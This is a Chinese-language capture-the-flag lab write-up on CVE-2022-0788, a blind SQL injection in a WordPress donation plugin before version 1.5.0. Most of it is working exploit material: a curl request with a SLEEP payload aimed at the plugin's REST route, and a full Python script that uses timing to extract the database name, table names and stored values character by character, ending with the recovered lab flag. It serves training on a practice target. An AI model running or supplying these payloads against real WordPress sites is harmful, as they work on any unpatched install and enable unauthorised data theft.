春秋云镜 CVE-2022-0788 wordpress插件 WP Fundraising Donation and Crowdfunding Platform < 1.5.0 SQLI

靶标介绍

wordpress插件 WP Fundraising Donation and Crowdfunding Platform < 1.5.0 的其中一个REST路由在SQL语句使用时没有对参数进行过滤，导致SQL注入漏洞。

启动场景

漏洞利用

exp

curl 'https://example.com/index.php?rest_route=/xs-donate-form/payment-redirect/3' \
    --data '{"id": "(SELECT 1 FROM (SELECT(SLEEP(5)))me)", "formid": "1", "type": "online_payment"}' \
    -X GET \
    -H 'Content-Type: application/json' 

找了个大佬写的脚本

https://www.cnblogs.com/upfine/p/17637840.html

import requests
import time

def time_delay(url, payload,headers):
    start_time = time.time()
    response = requests.get(url, data=payload,headers=headers)
    end_time = time.time()
    delay = end_time - start_time
    return delay

def time_based_blind_sql_injection(url,headers):
    result = []
    for i in range(1, 100):
        for j in range(32, 126):  # r'0123456789abcdefghijklmnopqrstuvwxyz_-{}':
            # find db ctfJ
            payload = '{"id": "(SELECT 1 FROM (SELECT(SLEEP( (if(ascii(substr(database(),'+str(i)+',1))='+str(j)+',sleep(2),1)))))me)", "formid": "1", "type": "online_payment"}'
            # find table
            payload = '{"id": "(SELECT 1 FROM (SELECT(SLEEP( (if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database() limit 0,1),' + str(i) + ',1))=' + str(102) + ',sleep(2),1)))))me)", "formid": "1", "type": "online_payment"}'
            payload = '{"id": "(SELECT 1 FROM (SELECT(SLEEP( (if(ascii(substr((select flag from flag limit 0,1),' + str(i) + ',1))=' + str(j) + ',sleep(2),1)))))me)", "formid": "1", "type": "online_payment"}'

            delay = time_delay(url, payload,headers)
            print('{ ', ''.join(result), ' } ->', i, '-', j, "time_delay:", delay)
            if delay > 2:
                result.append(chr(j))
                print(''.join(result))
                break
    else:
        print("The payload is not vulnerable to SQL injection.")
    print('result:', ''.join(result))

if __name__ == "__main__":
    url = "http://eci-2zehgubmr60nhm5swagf.cloudeci1.ichunqiu.com/index.php?rest_route=/xs-donate-form/payment-redirect/3"
    headers = {'Content-Type': 'application/json'}
    time_based_blind_sql_injection(url,headers)

得到flag

flag{58f06264-30a7-4cc6-bfb2-0928024a6788}